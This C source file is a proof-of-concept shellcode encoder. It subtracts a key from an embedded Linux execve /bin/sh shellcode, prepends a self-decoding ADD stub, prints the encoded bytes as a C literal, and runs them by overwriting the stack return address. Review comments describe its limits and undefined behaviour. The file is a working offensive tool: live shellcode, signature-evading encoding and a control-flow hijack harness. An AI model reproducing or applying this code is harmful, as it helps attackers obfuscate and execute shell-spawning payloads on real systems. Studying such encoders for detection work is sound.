/* 
 * Proof-of-concept to test the decoder 
 *
 * Rodrigo Rubira Branco <rodrigo@kernelhacking.com>
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 *
 * ADD Shellcode encoder 
 * 
 */

/* Forward declaration; the definition follows main(). */
void execute(char *data);

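/*
 * Build and print an ADD-encoded, self-decoding copy of the embedded payload.
 *
 * What the code does:
 *   1. Subtracts the constant `key` from every payload byte.
 *   2. Patches two placeholder bytes of the decoder stub: offset 4 receives
 *      the encoded length, offset 8 receives the key.
 *   3. Joins stub + encoded payload in a heap buffer and prints it as a C
 *      string literal, 15 bytes per line.
 *   4. Passes the buffer to execute().
 *
 * Review notes:
 *   - Every length is measured with strlen(), so a byte that encodes to 0x00
 *     (or a patched stub byte that becomes 0x00) silently truncates the
 *     output. The data embedded here contains no such byte.
 *   - Offset 4 is a single byte, so the encoded length has to fit in it.
 *   - Only offsets 4 and 8 of the stub change. The remaining stub bytes are
 *     constant, so the encoding hides the payload bytes from a plain byte
 *     match but leaves the stub itself as a fixed pattern.
 *   - `end` is ordinary malloc() memory. On systems that map the heap
 *     non-executable, the execute() call is expected to fault, not run.
 *
 * Returns 0 on success, 1 if the output buffer cannot be allocated.
 */
int main() {

  char decoder[] =
    /* ADD decoder stub; bytes 4 and 8 are 0x00 placeholders patched below */
    "\xeb\x0c\x5e\x6a\x00\x59\x80\x06\x00\x46\xe2\xfa\xeb\x05\xe8\xef"
    "\xff\xff\xff";

  /* Linux execve /bin/sh shellcode */
  char shellcode[] =
    "\xeb\x11\x31\xc9\x5e\xb1\x23\x80\x6c\x0e\xff\x17\x80\xe9\x01"
    "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x48\xd7\x67\x7f\x46\x46"
    "\x8a\x7f\x7f\x46\x79\x80\x85\xa0\xfa\xa0\x7b\x3b\x23\xa0\x5b"
    "\x3b\x27\xa4\x63\x3b\x23\xa2\x6b\x3b\x1f\xc7\x22\xe4\x97";

  const int key = 26;             /* constant subtracted here, re-added by the stub */
  const int bytes_per_line = 15;  /* width of the printed listing */
  int col = bytes_per_line;       /* forces the opening quote on the first byte */
  size_t i;
  size_t raw_len;
  size_t enc_len;
  size_t dec_len;
  size_t total;
  char *end;

  /* Measure once: the loop below rewrites the bytes strlen() would scan. */
  raw_len = strlen(shellcode);
  for (i = 0; i < raw_len; i++) {
    shellcode[i] -= key;
  }

  /* Re-measure after encoding so truncation by an encoded NUL is reflected. */
  enc_len = strlen(shellcode);

  decoder[4] += (char)enc_len;
  decoder[8] += (char)key;

  /* Only valid after patching: before it, byte 4 is NUL and ends the string. */
  dec_len = strlen(decoder);
  total = dec_len + enc_len;

  /* +1 for the terminator; the original allocation was one byte short. */
  end = malloc(total + 1);
  if (end == NULL) {
    fprintf(stderr, "malloc failed\n");
    return 1;
  }

  /*
   * memcpy instead of strcat: the fresh buffer is uninitialised, so strcat
   * would search indeterminate memory for a terminator.
   */
  memcpy(end, decoder, dec_len);
  memcpy(end + dec_len, shellcode, enc_len);
  end[total] = '\0';

  /* %zu matches size_t; %d with a size_t argument is undefined behaviour. */
  printf("\nDecoder: %zu Shellcode: %zu Result %zu\n", dec_len, enc_len, total);

  printf("\n\nchar shellcode[] =\n");

  for (i = 0; i < total; ++i) {
    if (col >= bytes_per_line) {
      if (i) {
        printf("\"\n");
      }
      printf("\t\"");
      col = 0;
    }
    ++col;
    printf("\\x%02x", ((unsigned char *)end)[i]);
  }

  printf("\";\n");

  /* Flush after the last line so the listing is complete before execute(). */
  fflush(stdout);

  execute(end);
  free(end);
  return 0;
}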


/*
 * Attempt to transfer control to the bytes at `data` by overwriting a stack
 * slot near this function's own local variable.
 *
 * The code takes the address of the local `ret`, advances it by two int-sized
 * slots, and stores `data` (cast to int) there.
 * NOTE(review): the slot is presumably meant to be the saved return address
 * of a 32-bit x86 frame built with a frame pointer and no stack protector.
 * Nothing in this file guarantees that layout -- confirm per compiler/flags.
 *
 * Caveats:
 *   - The store writes outside the `ret` object, which is undefined
 *     behaviour; the compiler may lay out, reorder or drop it.
 *   - `(int)data` discards the upper bits of the pointer wherever pointers
 *     are wider than int.
 *   - The caller passes a malloc() buffer; where heap pages are mapped
 *     non-executable, a jump into it faults instead of running.
 *
 * data: address control is meant to be redirected to.
 */
void execute(char *data) {
  
  int *ret;
  /* Two int slots above the local: the assumed return-address slot. */
  ret = (int *)&ret + 2;
  /* Replace that slot's contents with the buffer address (truncated to int). */
  (*ret) = (int)data;
  
}




